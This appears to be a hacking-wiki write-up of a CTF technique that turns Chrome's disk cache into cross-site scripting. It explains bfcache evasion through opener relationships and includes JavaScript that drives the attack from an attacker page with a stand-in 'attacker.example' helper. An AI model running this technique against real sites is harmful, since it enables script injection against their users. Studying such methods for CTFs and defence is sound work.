Chrome Cache to XSS

Technique taken from this writeup (SECCON CTF 2022 Quals, challenge spanote).
There are two important types of cache: the back/forward cache (bfcache), which keeps a full snapshot of a page for back/forward navigation, and the disk cache, which stores HTTP responses.
An interesting property of the disk cache is that it holds not only HTTP responses that were rendered as web pages, but also responses fetched with fetch(). In other words, if you navigate to the URL of a resource that was previously fetched, the browser renders the cached response as the page.
There is another important point. If both the disk cache and bfcache hold a valid entry for a page at a back/forward navigation, bfcache takes priority over the disk cache. So if you need the copy from the disk cache for a page that sits in both, you have to somehow make that page ineligible for bfcache.

Disable bfcache

bfcache is already disabled by the default launch options of puppeteer, so a bot driven by puppeteer does not need the trick below.
Let's try the interesting behavior in this challenge.
Firstly, you have to disable bfcache[2]. There are many conditions under which a page is excluded from bfcache (Chromium tracks them as "not restored reasons").
The easy way is to trigger RelatedActiveContentsExist: a window that has an opener (or that was opened without noopener) shares a browsing context group with it, and pages in such a window are not stored in bfcache.
Therefore, the following procedure reproduces the behavior:
  1. Access a web page (e.g. https://example.com).
  2. Execute open("http://spanote.seccon.games:3000/api/token").
     • The server returns a response with a 500 status code.
  3. In the opened tab, access http://spanote.seccon.games:3000/.
     • The root page fetches http://spanote.seccon.games:3000/api/token, and that response is stored in the disk cache under the same URL.
  4. Execute history.back().
     • The cached JSON response is rendered on the page!
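The four steps above, driven from an attacker page rather than typed by hand, as an added example (not the writeup's exploit). It assumes the root page of TARGET fetch()es API_PATH on load, as in the procedure, and it uses a hypothetical attacker-hosted BACK_PAGE: an opener cannot call history.back() on a cross-origin window, so the opened tab is sent to a page of our own that calls history.go(-2) on the tab's history.

```javascript
// Added example (not the writeup's exploit): attacker-side orchestration of the
// four steps above. Assumptions: TARGET's root page fetch()es API_PATH on load,
// and BACK_PAGE is a hypothetical attacker-hosted page that calls history.go(-2).
const TARGET = "http://spanote.seccon.games:3000";
const API_PATH = "/api/token";
const BACK_PAGE = "https://attacker.example/back.html"; // hypothetical URL

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// The sequence of documents the opened tab is sent to, with the reason for each.
function buildPlan(target, apiPath, backPage) {
  return [
    // 1. open() WITHOUT "noopener": the new tab stays in our browsing context
    //    group, so RelatedActiveContentsExist keeps the pages it loads out of
    //    bfcache. Direct navigation to the API is answered with a 500 (entry #1).
    { url: target + apiPath, why: "500 page, not bfcache-eligible (entry #1)" },
    // 2. The SPA root fetch()es the API; the 200 JSON response is written to the
    //    disk cache under exactly the URL of entry #1.
    { url: target + "/", why: "SPA fetches API, response enters disk cache (entry #2)" },
    // 3. An opener cannot call history.back() on a cross-origin window, so the
    //    tab is sent to our own page, which may traverse the tab's joint session
    //    history with history.go(-2).
    { url: backPage, why: "same-origin helper runs history.go(-2) (entry #3)" },
  ];
}

// Drive the plan. `openFn` defaults to window.open so tests can substitute a fake.
async function runAttack(plan, openFn = (url) => open(url), delayMs = 1500) {
  const tab = openFn(plan[0].url);
  for (const step of plan.slice(1)) {
    await sleep(delayMs);    // give the previous navigation time to commit and load
    tab.location = step.url; // cross-origin location assignment is allowed for openers
  }
  return tab;
}

// Body of BACK_PAGE. Going back two entries lands on entry #1 (the API URL).
// bfcache is unavailable for it, so Chrome restores it from the disk cache, which
// now holds the fetch()ed JSON, and that response is rendered as the document.
const BACK_PAGE_HTML = "<script>history.go(-2);</script>";
```

The delays are a crude stand-in for load completion; the opener cannot observe a cross-origin tab's load events, so in practice you tune delayMs against the target's response time.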
You can confirm that the disk cache was used in the Network panel of Chrome DevTools: the Size column of the request shows "(disk cache)".